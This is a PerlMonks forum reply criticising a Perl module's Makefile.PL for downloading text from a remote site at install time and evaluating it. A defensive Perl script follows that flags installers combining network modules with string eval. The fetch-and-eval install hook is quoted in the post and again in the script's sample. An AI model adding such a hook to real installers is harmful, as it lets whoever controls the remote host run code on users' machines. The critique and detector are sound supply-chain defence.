http://www.perlmonks.org?node_id=349906


in reply to Re: CGI::Application vs CGI::Builder
in thread CGI::Application vs CGI::Builder

Perrin, maybe the style is not evil, but what Makefile.PL does is quite evil:

    ; eval { require LWP::Simple
           ; my $res = LWP::Simple::get
                       ( "http://perl.4pro.net/install.txt"
                       . "?DISTRIBUTION=$dist&VERSION=$vers&PERL=$]-$^O"
                       )
           ; eval $res if $res
           }

I am assuming that this is just a benign install counter and maybe it has the ability to alert the user that the version being installed has been updated, but how do I know that there is not something like this at perl.4pro.net?

    ; if (grep /$user_domain/, @my_enemies)
      { open(FH, '<', 'backdoor.txt')
      ; print while (<FH>)
      ; print STDERR "$user_host 0wn3d! hehehe\g\g\g\g\g\g\g\n"
      }
      else
      { open(FH, '<', 'message.txt')
      ; print while (<FH>)
      ; print STDERR "Tick\n"
      }
    ; close FH

And even if there is no code like that: 1. It is still underhanded! And 2. What happens if perl.4pro.net gets owned? Then someone could install code that does the above. Bonus points for doing it as a kernel module!

Would it not be ironic were his site to be compromised by another module's "Counter feature"?

And look at perl.4pro.net: it shows quite a few Perl modules, and I would wager that most of them have the same code in the Makefile.PL.
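
The pattern objected to in the post above (a network fetch at install time whose result is passed to a string eval) can be checked for before an installer is run. The following is an added example, not part of the original post or of any module's own code; `audit_installer`, the module list and the `Example::Dist` name are assumptions, and the sample Makefile.PL text is constructed around the quoted snippet.

```perl
#!/usr/bin/perl
# Added example: flag installer scripts (Makefile.PL / Build.PL) that can
# download text and string-eval it. Heuristic text scan; nothing is executed.
use strict;
use warnings;

# Modules that give an installer network access (representative, not exhaustive).
my $NET_RE = qr/\b(LWP::Simple|LWP::UserAgent|HTTP::Tiny|IO::Socket|Net::HTTP)\b/;

sub audit_installer {
    my ($source) = @_;
    my (@findings, %seen);
    my $line_no = 0;
    for my $line (split /\n/, $source) {
        $line_no++;
        (my $code = $line) =~ s/(?<![\$\\])#.*//;   # crude comment strip, keeps $#array
        if ($code =~ $NET_RE) {
            $seen{network} = 1;
            push @findings, "line $line_no: uses network module $1";
        }
        if ($code =~ m{(https?://[^\s"']+)}) {       # informational only
            push @findings, "line $line_no: hard-coded URL $1";
        }
        # String eval: 'eval' followed by a variable or a quote, not a block '{'.
        if ($code =~ /\beval\s*\(?\s*(\$\w+|["']|qq?\b)/) {
            $seen{string_eval} = 1;
            push @findings, "line $line_no: string eval of $1";
        }
    }
    my $verdict = ($seen{network} && $seen{string_eval}) ? 'HIGH'
                : (%seen ? 'REVIEW' : 'OK');
    return ($verdict, @findings);
}

# Constructed sample input, modelled on the snippet quoted in the post.
my $sample = <<'END_SAMPLE';
use ExtUtils::MakeMaker;
; eval { require LWP::Simple
       ; my $res = LWP::Simple::get( "http://perl.4pro.net/install.txt"
                                   . "?DISTRIBUTION=$dist&VERSION=$vers&PERL=$]-$^O" )
       ; eval $res if $res
       }
WriteMakefile( NAME => 'Example::Dist', VERSION => '0.01' );
END_SAMPLE

# Audit a file given on the command line, otherwise the embedded sample.
if (@ARGV) { open my $fh, '<', $ARGV[0] or die "$ARGV[0]: $!"; local $/; $sample = <$fh> }
my ($verdict, @findings) = audit_installer($sample);
print "verdict: $verdict\n";
print "  $_\n" for @findings;
```

A `HIGH` verdict means the script both reaches the network and evaluates a string, so whoever controls the remote host (or the path to it) decides what runs during `perl Makefile.PL`; a clean scan only shows that this textual pattern is absent.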